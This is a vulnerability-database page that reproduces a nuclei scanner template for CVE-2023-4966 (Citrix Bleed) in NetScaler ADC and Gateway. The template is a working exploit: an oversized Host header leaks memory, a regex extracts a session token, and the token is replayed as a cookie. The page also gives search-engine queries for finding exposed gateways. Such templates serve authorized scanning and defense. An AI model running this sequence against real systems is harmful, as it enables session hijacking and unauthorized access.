Lucene search
K

Citrix Bleed - Leaking Session Tokens

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 184 Views

Citrix Bleed - Leaking Session Tokens in NetScaler ADC and NetScaler Gateway. Information disclosure vulnerability in VPN virtual server, ICA Proxy, CVPN, and RDP Proxy configurations

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Citrix Netscaler_Application_Delivery_Controller
25 Oct 202312:37
githubexploit
GithubExploit
Exploit for Out-of-bounds Read in Citrix Netscaler_Application_Delivery_Controller
5 Jul 202523:56
githubexploit
GithubExploit
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Citrix Netscaler_Application_Delivery_Controller
29 Oct 202315:31
githubexploit
GithubExploit
Exploit for Out-of-bounds Read in Citrix Netscaler_Application_Delivery_Controller
8 Jul 202514:12
githubexploit
GithubExploit
cve-deep-dives
16 Apr 202615:59
githubexploit
GithubExploit
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Citrix Netscaler_Application_Delivery_Controller
25 Oct 202307:17
githubexploit
GithubExploit
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Citrix Netscaler_Application_Delivery_Controller
27 Jan 202611:29
githubexploit
GithubExploit
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Citrix Netscaler_Application_Delivery_Controller
25 Oct 202307:17
githubexploit
GithubExploit
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Citrix Netscaler_Application_Delivery_Controller
29 Oct 202315:31
githubexploit
GithubExploit
Exploit for Out-of-bounds Read in Citrix Netscaler_Application_Delivery_Controller
30 Jun 202511:02
githubexploit
Rows per page
id: CVE-2023-4966

info:
  name: Citrix Bleed - Leaking Session Tokens
  author: DhiyaneshDK
  severity: high
  description: |
    Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.
  impact: |
    Unauthenticated attackers can leak session tokens from memory, potentially hijacking authenticated sessions and accessing sensitive Gateway resources.
  remediation: |
    Apply Citrix security updates immediately. Affected versions include NetScaler ADC and Gateway 14.1 before 14.1-8.50, 13.1 before 13.1-49.15, 13.0 before 13.0-92.19, and 12.1 (EOL).
  reference:
    - https://github.com/assetnote/exploits/blob/main/citrix/CVE-2023-4966/exploit.py
    - https://github.com/Chocapikk/CVE-2023-4966
    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
    - https://x.com/assetnote/status/1716757539323564196?s=20
    - https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-4966
    cwe-id: CWE-119,NVD-CWE-noinfo
    epss-score: 0.99999
    epss-percentile: 0.99993
    cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: citrix
    product: netscaler_application_delivery_controller
    shodan-query:
      - title:"Citrix Gateway" || title:"Netscaler Gateway"
      - http.title:"citrix gateway" || title:"netscaler gateway"
    fofa-query: title="citrix gateway" || title:"netscaler gateway"
    google-query: intitle:"citrix gateway" || title:"netscaler gateway"
  tags: cve,cve2023,citrix,adc,info-leak,kev,exposure,vkev,vuln
variables:
  payload: '{{repeat("a", 24812)}}'
  str: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |+
        GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
        {{str}}: {{Hostname}}
        Host: {{payload}}

      - |+
        POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1
        Host: {{Hostname}}
        Cookie: NSC_AAAC={{session}}

    unsafe: true

    extractors:
      - type: regex
        name: session
        part: body_1
        group: 1
        regex:
          - '([a-f0-9]{100}45525d5f4f58455e445a4a42)'
        internal: true

      - type: regex
        part: body_2
        regex:
          - '([a-z0-9._]+)'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'NSC_AAAC='
          - 'HTTP/1.1'

      - type: word
        words:
          - '{"issuer":'
# digest: 4a0a00473045022100e236555ded7c579e88ee802d236104c3770143221f53a673dd68cea0f98a1c510220448900e6f75bd442f35fe8af699bcdc68eaa94e5219c4ffc9c154b7c19820779:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.17.5 - 9.4
EPSS0.99999
SSVC
184